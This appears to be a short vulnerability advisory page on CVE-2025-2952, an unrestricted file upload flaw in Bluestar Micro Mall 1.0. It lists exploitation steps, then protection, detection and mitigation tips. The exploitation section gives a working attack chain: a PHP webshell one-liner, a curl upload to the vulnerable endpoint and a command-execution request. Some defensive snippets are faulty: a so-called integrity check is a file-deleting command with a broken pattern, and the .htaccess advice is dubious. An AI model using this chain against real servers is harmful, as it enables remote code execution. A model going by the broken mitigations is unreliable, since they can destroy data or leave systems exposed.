How CVE-2025-2952 Works
The vulnerability in Bluestar Micro Mall 1.0 allows remote attackers to upload arbitrary files via the `/api/api.php?mod=upload&type=1` endpoint due to insufficient file validation. The `File` parameter lacks proper checks for file type, size, or content, enabling malicious actors to upload webshells or execute server-side code. Attackers can exploit this by sending a crafted HTTP POST request with a malicious file, leading to remote code execution (RCE) under the web server’s context.
DailyCVE Form
Platform: Bluestar Micro Mall
Version: 1.0
Vulnerability: Unrestricted File Upload
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation
1. Craft Malicious File
echo "<?php system($_GET['cmd']); ?>" > shell.php
2. Upload via Curl
curl -X POST -F "[email protected]" "http://target.com/api/api.php?mod=upload&type=1"
3. Execute Commands
curl "http://target.com/uploads/shell.php?cmd=id"
Protection
1. File Validation
$allowed_types = ['image/jpeg', 'image/png'];
if (!in_array($_FILES['File']['type'], $allowed_types)) {
die("Invalid file type.");
}
2. Disable PHP Execution
<Directory "/var/www/uploads"> php_flag engine off </Directory>
3. Restrict Upload Directory
location ^~ /uploads/ {
deny all;
}
4. Use .htaccess Protection
AddHandler cgi-script .php .pl .py .jsp
Detection
1. Log Analysis
grep "POST /api/api.php?mod=upload" /var/log/apache2/access.log
2. File Integrity Check
find /var/www/uploads -type f -name ".php" -exec rm -f {} \;
Mitigation
- Patch: Apply vendor updates.
- WAF Rules: Block suspicious uploads.
- Permissions: Restrict upload folder to
read-only.
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
